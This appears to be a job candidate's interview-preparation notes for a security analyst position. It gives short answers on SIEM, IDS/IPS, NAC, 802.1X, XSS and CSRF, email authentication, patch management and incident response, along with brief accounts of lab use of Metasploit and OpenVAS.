Other Technical stuff

Question 1

What can NetFlow be used for

Answer 1

Unusual Data Transfers:

Unusual Destinations:

Large transfers

Unusual Protocols:

Off-Hours Activity:

Data Encryption:

User Accounts and Anomalies:

Security Alerts and Alarms:

Historical Baseline Comparison:

File and Folder Access Logs:

Question 2

What experience do have with SIEMs

Answer 2

The only exposure to a SIEM in a professional sense is getting the alearts that an account lockout event has occured, and then investigating the incident.

From an academic perspective, I have reviewed SIEM alerts as part of my Security + studies.

Question 3

What experience do have with IDS/IPS

Answer 3

As part of my Security+ studies, I have been exposed to IPS alerts, and was expected to interpret them and select the answer that best summarizes what the alert is indicating.

I also have exposure to security onion which is an open source IPS where I had to report out my findings for an assignment requiring that I reconstruct an event.

Question 4

What experience do you have with Vulnerability Scanners

Answer 4

I have used OpenVAS in class to both scan and find vulnerabilities that exist on my machines, but also to find vulnerabilities that exist on the machines of other students. I would then use this information to patch my systems or launch attacks on the other students systems.

Question 5

What experience do you have with Endpoint security

Answer 5

I have worked with McAfee ePO to investigate user reported security events, and I have experience with troubleshooting the agents and the installation of the agent on workstations.

My company Centaris has a similar offering for their clients and I would routinely get alerts to investigate alerts, and troubleshoot agent issues

Question 6

What experience do you have with email security

Answer 6

I would regularly work within Proofpoint to review emails that were blocked based on pre-set policies. I would look into the information within the email header, and work with the employees to determine if the email was safe to forward, or if it was spam/phishing

Question 7

What experience do you have with MetaSploit

Answer 7

I had to develop a plan of attack for my final in my attack and defend class. I had to learn how to use metasploit to attack machines.

I can make use of metasploit to scan devices for vulnerabilities to exploits, and can run exploits against machines.

Question 8

What experience do you have with nMap

Answer 8

Scanning for OSes

Scan for open ports

Scan for services running on machines.

Question 9

Explain the use of NAC

Answer 9

Purpose: NAC is a security solution that ensures only authorized and compliant devices can access a network. It provides network administrators with the means to enforce security policies and maintain control over who and what can connect to the network.

Key Functions:

Device Authentication: NAC verifies the identity of devices trying to connect to the network, ensuring they are legitimate and meet security requirements.

Policy Enforcement: It enforces security policies, such as ensuring endpoint devices have up-to-date antivirus software, the latest patches, and proper configurations before granting access.

Quarantine and Remediation: If a device doesn’t meet security requirements, NAC can quarantine it in a segregated network segment (quarantine VLAN) and initiate remediation actions to bring it into compliance.

Continuous Monitoring: NAC continually monitors devices on the network, detecting changes in compliance status and reacting accordingly.

Components: NAC typically includes components like an authentication server, policy enforcement points (often within network switches or access points), and a management console for configuring policies and monitoring compliance.

Question 10

Explain 802.1x

Answer 10

Purpose: 802.1X is an IEEE standard used for port-based network access control. It ensures that only authenticated devices can access network services by controlling access at the network port level.

Key Functions:

Port Authentication: 802.1X requires devices to authenticate themselves before they are granted access to a network port, such as an Ethernet port or a wireless access point.
Authentication Protocols: It supports various authentication protocols, including EAP (Extensible Authentication Protocol), which allows for flexibility in the authentication method used.
Dynamic VLAN Assignment: 802.1X can assign devices to specific VLANs based on authentication results, segregating them into appropriate network segments.
Components: 802.1X involves three main components:

Supplicant: This is the client device (e.g., a laptop or smartphone) that seeks access to the network.
Authenticator: The network device (e.g., a switch or access point) that enforces authentication before allowing access.
Authentication Server: The server responsible for verifying the supplicant’s credentials and deciding whether to grant network access.

Question 11

How does NAC and 802.1x work together

Answer 11

NAC solutions often leverage 802.1X as a key mechanism for authenticating devices at the network port level.
When a device connects to a network port, 802.1X is used to perform authentication. If successful, the device is granted access.
NAC then assesses the device’s overall compliance with security policies. If the device passes this assessment, it is granted full access to the network. If not, NAC may relegate it to a quarantine network until it meets compliance requirements.
In summary, NAC and 802.1X are complementary technologies that provide a layered approach to network access control. 802.1X focuses on authenticating devices at the port level, while NAC adds additional layers of security policy enforcement, monitoring, and remediation to ensure that devices remain compliant and secure throughout their connection to the network. Together, they help organizations maintain a strong security posture by controlling and securing network access.

Question 12

Can you provide examples of how you’ve collaborated with IT infrastructure teams to implement security measures without disrupting the organization’s operations?

Answer 12

At my former job we coordinated with leaders from each departments to update the NTFS permissions and group policies for their network drives. We had to do this in a way that was as minimally intrusive as possible.

Question 13

What role does risk assessment play in your approach to cybersecurity, and how do you prioritize security measures based on potential risks?

Answer 13

Risk assessments are essential in understanding and prioritizing security measures within an organization. Risk is where vulnerabilities meet threats. If there is a system that has a vulnerability, but the threat of exploit is low, then I would prioritize a system that has a vulnerability, and also has the potential of being exploited by a threat actor. Mission critical systems that are high risk should take priority over any other system.

Question 14

How would you address the challenge of ensuring security while allowing for the agility required in modern IT environments, including cloud services and remote work?

Answer 14

I believe that the balance and agility comes with working closely with the department leaders to identify their needs and desires and balance that with security. When an impass is reached, having a framework to address and work through the issues is key to success.

Question 15

What is XSS and its types.

Answer 15

XSS exploits the trust a browser has in a web server.

: XSS is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (usually JavaScript) into web content that is then viewed by other users. These scripts run in the context of the victim’s browser, allowing the attacker to steal information, manipulate web pages, or perform actions on behalf of the user.

Reflected: The injected script is embedded in a URL or web form and reflected off a web server, affecting users who click on a malicious link or submit a manipulated form.

Stored XSS: The injected script is permanently stored on the target server and served to users who access the affected page.

Question 16

What is CSRF and its types

Answer 16

CSRF is another web application vulnerability that exploits the trust a website has in a user’s browser. In a CSRF attack, an attacker tricks a user into unknowingly making an unwanted request to a web application where the user is authenticated. This can lead to actions being performed on behalf of the user without their consent

Standard: attackers use social engineering techniques to trick users into performing actions they didn’t intend to on a target site.

Blind: he attacker launches a CSRF attack without knowing the outcome of the attack (e.g., changing a user’s email address without knowing what the new address will be).

Question 17

How do you mitigate XSS

Answer 17

Input validation,

Output encoding: Encode data before rendering it in the HTML to prevent scripts from being executed.

Question 18

How do you mitigate CSRF

Answer 18

Same-Site Cookies: Configure cookies as “SameSite” to prevent them from being sent in cross-origin requests.

Question 19

What does DKIM do

Answer 19

DomainKeys Identified Mail (DKIM) is another email authentication method that focuses on email message integrity and sender authenticity. Here’s how DKIM works:

Digital Signature: The sender’s email server adds a digital signature to the email header using a private key. This signature is generated based on the content of the email, including the body and selected header fields.

Public Key in DNS: The sender’s domain publishes a public key in DNS, which can be used to verify DKIM signatures.

Incoming Email: When the recipient’s mail server receives the email, it retrieves the public key from DNS using the sender’s domain.

Signature Verification: The recipient’s server uses the public key to verify the digital signature in the email header. If the signature is valid and matches the email’s content, the email is considered authentic.

Question 20

What does SPF do

Answer 20

Sender Policy Framework (SPF) is an email authentication method used to prevent email spoofing and phishing attacks. It works by allowing domain owners to specify which mail servers are authorized to send emails on behalf of their domain. Here’s how SPF works:

DNS Record: The domain owner publishes an SPF record in their DNS settings. This record contains information about the authorized mail servers that are allowed to send emails for that domain.

Incoming Email: When an email is received by the recipient’s mail server, the server checks the SPF record of the sender’s domain by querying DNS.

SPF Check: The recipient’s server compares the IP address of the sending mail server with the list of authorized IP addresses in the SPF record. If the sending server’s IP address is not listed, the email may be marked as suspicious or rejected.

Question 21

What does SPF accomplish

Answer 21

Anti-Spoofing: SPF helps prevent email spoofing, where attackers send emails that appear to be from a legitimate domain.
Phishing Prevention: It reduces the likelihood of phishing attacks by verifying the authenticity of the sender’s domain.
Email Reputation: SPF records can also be used by email receivers to assess the reputation of a sending domain.

Question 22

What does DKIM help accomplish

Answer 22

Message Integrity: DKIM ensures that the email message has not been tampered with during transit.
Sender Authentication: It verifies that the email was indeed sent by the claimed sender’s domain, reducing the risk of phishing.

Question 23

Why is patch management important

Answer 23

Regular patch management is critical to ensuring the security posture of the environment. Patches regularly resolve security vulnerabilities and make systems more stable.

Question 24

What are the steps to patch management

Answer 24

Identify patches using a feed of information from vendors, open-source sites

Prioritize patching on the risk presented to the system by not patching

Test in a sandbox

Schedule update

Perform backup of system

Monitor the system

Have a rollback plan

Documentation

Question 25

What are the steps to handle a potential data breach

Answer 25

1. Document every step taken before during and after the discovery and
2. Preserve evidence
3. Notify the IT Security Manager following escalation process
4. Determine if there is evidence to suggest that this is breach is on going by searching for network artifacts such as firewall logs, web application logs, unusual traffic patterns, NetFlow logs, Malware scans and user authentication logs on devices that are under suspicion

if on-going, isolate affected systems

Engage response team

Determine Scope

Identify Attack Vector

Contain and Eradicate

Question 26

What are the benfits of a SIEM

Answer 26

A SIEM will aggregate logs from different devices across the network in order to analyze and report on them.

A SIEM assists in threat detection making use of rules, and behavioral analysis.

Integration in existing infrastructure, and scalable solutions for the future

Enhanced visibility into environment and security posture.

Question 27

How do you handle strange traffic on a firewall

Answer 27

Identify the alert

Establish if the alert is true or false positive

Isolate the affected system

Analyze outbound traffic

Reivew the IP, port information, protocols, and payload data

Determine the nature of the traffic

Does this traffic belong to a known app or service, or is it unrelated and potentially malicious.

Check for malware and compromise

Review AV scan, processes, logs, system registry.

Identify the cause

Perform root cause analysis to find the actual rool of the issue

Assess impact

Contain and remediate

Question 28

How would you respond to a DDOS attack

Answer 28

Identify and confirm the attack

Alert any relevant teams

Isolate the affected systems

Traffic Diversion or rate limiting or spin up additional cloud resources

Implement counter measures like an IDS

Question 29

What are some DDOS countermeasures

Answer 29

Use load balancing for web applications (content delivery network)

Traffic analysis

Rate limiting

Question 30

How would you respond to an un-authorized device connecting to the network

Answer 30

Isolate the device by disabling the network port it is plugged into

Capture info such as which switch it connected to, the MAC address, and IP infomraiton

Investigate the information that I gathered.

Assess the information for threats

Escalate and remediate the situation